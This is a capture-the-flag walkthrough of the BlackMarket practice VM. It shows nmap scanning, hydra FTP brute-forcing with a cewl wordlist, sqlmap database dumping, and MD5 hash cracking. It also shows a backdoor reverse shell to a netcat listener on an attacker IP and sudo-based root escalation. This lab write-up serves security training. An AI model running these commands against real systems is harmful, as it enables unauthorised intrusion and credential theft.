BlackMarket VM presented at Brisbane SecTalks BNE0x1B (28th
Session) which is focused on students and other InfoSec Professional. This VM
has total 6 flags and one r00t flag. Each Flag leads to another Flag and flag
format is flag {blahblah}. Download it from here.
VM Difficulty Level: Beginner/Intermediate
Penetrating Methodology
§
Network Scanning (Nmap, netdiscover)
§
Information gathering:
§
Abusing web browser for the 1st flag
§
Generate dictionary (Cewl)
§
FTP brute-force (hydra)
§
FTP login for the 2nd flag
§
SQL injection for the 3rd flag
§
Blackmarket login for the 4th flag
§
Squirrel mail login for the 5th flag
§
Get cypher mail from inside Inbox.Draft
§
Decipher the mail and reach to backdoor.php
§
Upload backdoor shell
§
Netcat session for the 6th flag
§
Import python one-liner for proper TTY shell
§
Sudo Rights Privilege Escalation
§
Get Root access and capture the flag.
Let’s Breach!!!
Let’s start with getting to know the IP of VM (Here, I have
it at 192.168.1.104 but you will have to find your own).
netdiscover
Now let’s move towards enumeration in context to identify
running services and open of victim’s machine by using the most popular tool
Nmap.
nmap -A 192.168.1.104
As you can observe it has dumped a lot of details related to
open ports and services running through them.
Knowing port 80 is open in victim’s network I preferred to
explore his IP in a browser. It put-up a Blackmarket login page but we don't
have credential yet, therefore, we like to view its source code for getting a
clue.
BOOOMMM!! Luckily I found the 1st flag from its
source code which was in base64.
flag1 {Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}
Since the 1st flag was the base64 encode so we
try to decode it with help of the following syntax.
Syntax: echo ‘base64
encoded text’ | base64 -d
WoW!! It sounds CIA
Operation Treadstone…………………
With help of Google I found this link and after
reading the whole article it becomes clear to me what CIA Operation Treadstone
is all about and why flag 1 has held
it secretly. Might be Black-market login credential could be extracted
from here, therefore I decide to generate a dictionary with help of ‘Jason
Bourne’ movie’s character. By executing the following command, we generated a
wordlist for username and password dictionary and save it as dict.txt.
cewl
http://bourne.wikia.com/wiki/Operation_Treadstone -d 2 -w
/root/Desktop/dict.txt
As we knew port 21 is open FTP, therefore, we use above dictionary
for FTP brute-force attack with help of hydra.
hydra -L dict.txt -P
dict.txt 192.168.1.104 ftp
Successfully found FTP-login user: nicky password:
CIA
Then with help above credential, we logged into FTP and
enumerate IMP.txt from inside /IMPFiles and download it with the help
of the following command.
ftp 192.168.1.104
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
get
IMP.txt
With help of cat command, we open the IMP.txt file and found
flag2 form inside it. Here also we read
the given message and analysis the given hint "CIA blackmarket Vehicle
workshop”.
cat IMP.txt
flag2 {Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}
Looking at above hint I focus on “Vehicle workshop” and start
examining the web browser for every possible directory having Vehicle/workshop
and UNFORTUNATELY I retrieved following web page when tried http://192.168.1.104/vworkshop.
It was a dashboard of Black-Market Auto Workshop.
After examining the whole dashboard we check-out the Spare
Parts and observe its web page and URL. So we decide to use SQLMAP against for
SQL injection.
Then execute the following command for fetching its database
name with help of sqlmap.
sqlmap -u
http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 --dbs
--batch
Here I found some database names and as per my
consideration, it should be blackmarket therefore without wasting time I step
ahead for fetching tables from inside it.
sqlmap -u
http://192.168.1.104/vworkshop/sparepartsstoremore.php?sparepartid=1 -D BlackMarket
--dump-all --batch
Here I found a table
“flag” and capture the 3rd flag from here.
Flag3 Find Jason Bourne Email access
Then we have fetched table “user” and found usernames with
their hash passwords.
With help of the online MD-5 decrypting tool, we decode
above-enumerated hashes and found following.
Username: admin
|password:
cf18233438b9e88937ea0176f1311885 MD5: BigBossCIA
Username: user |password: 0d8d5cd06832b29560745fe4e1b941cf md5
(md5($pass)) : user
Then again we explore target IP in the browser and enter
following credential for login.
admin
BigBossCIA
It put-up a pop with flag 4 along with a message as shown.
flag4{bm90aGluZyBpcyBoZXJl}
Jason Bourne Email access ?????
From Inside customers, I got email Id jbourne@cia.gov of
user Jason Bourne.
At this stage I felt to use Dirb for directory brute-force
attack, here we notice /squirrelmail/
and for sure we will be going to get something from here.
So we explore following URL http://192.168.1.104/squirrelmail/
and enter given below credential as described in the 4th flag (Jason
Bourne Email access ?????)
Username:
jbourne@cia.gov
Password: ?????
It gives the following mailbox as shown and I start
further enumeration.
Then while inspecting INBOX.Drafts I found the 5th
flag from inside IMPORTANT MESSAGE mail.
Flag5
{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}
And after reading this we find some encoded text
which needs to be decode
Then I decoded the above text as shown and after reading it,
I concluded that there should be a “passpass.jpg” under a directory
/kgbbackdoor inside Blackmarket workshop which will take us to actual backdoor.
So without wasting time I look for above-said path.
http://192.168.1.104/vworkshop/kgbbackdoor/PassPass.jpg
hhheheyy!!! This image must be hiding something inside, let
download it.
Then I use string tool and enter the following command to
extract metadata from inside it.
strings PassPass.jpg
Here we found something interesting.
Pass = 5215565757312090656
Since above extract metadata “Pass” which could be the
possible password, and we can use this for further approch therefore we try to
decode it. As it was in decimal (5215565757312090656) format so first, we decode it into hex (4861696C4B474220) then decode it
into ascii and obtained “HailKGB”
As slowly and gradually we are moving towards our goal as it
getting more-and-more hectic for me. After penetrating more I reached at
following URL where you will found Page Not Found error message…….
BANG ON Dear, it is an illusion because at this page you will
get a hidden login form as declared in the encrypted mail. Still, if you have
any confusion, please read above decoded text message drop for Dimitri one more
time, everything will be cleared to you.
B0000MMM!!! Here we have access the backdoor about whom the
sender has informed to Dimitri.
Now lets enter attacker IP : 192.168.1.107 and listening port 4444 and then start netcat listen
in a new terminal to get victim’s revese connection.
netcat -lvp 4444
With help of netcat we successfully spawn pty shell of
victim’s VM machine then open flag.txt with help of cat command and found 6th
the last flag of this VM. Now we need to get root access to finish this
challenge.
cat flag.txt
flag6{Um9vdCB0aW1l}
cd /home
ls -al
cd .Mylife
ls -al
cat .secret
while reading the message
I notice something prodigious i.e. DimitriHateApple because the file is
named as secret, therefore, I took DimitriHateApple as the password for user:
Dimitri
Then I try to login with Dimitri and for that, I execute the
following command to access proper terminal.
python -c ‘import
pty; pty.spawn(“/bin/bash”)’
su dimitri
DimitryHateApple
Great!!! We login successfully now let’s try privilege
escalation for root access.
I was shocked when I checked sudo rights for user Dimitri
because I notice ALL Privilege are allotted.
sudo -l
(ALL:ALL) ALL
sudo su
Yehhh!! We own root access.
cd /root
ls
cat THEEND.txt
HURRAYYYY!!!! We finished this challenge.
Happy Hacking
0 comments:
Post a Comment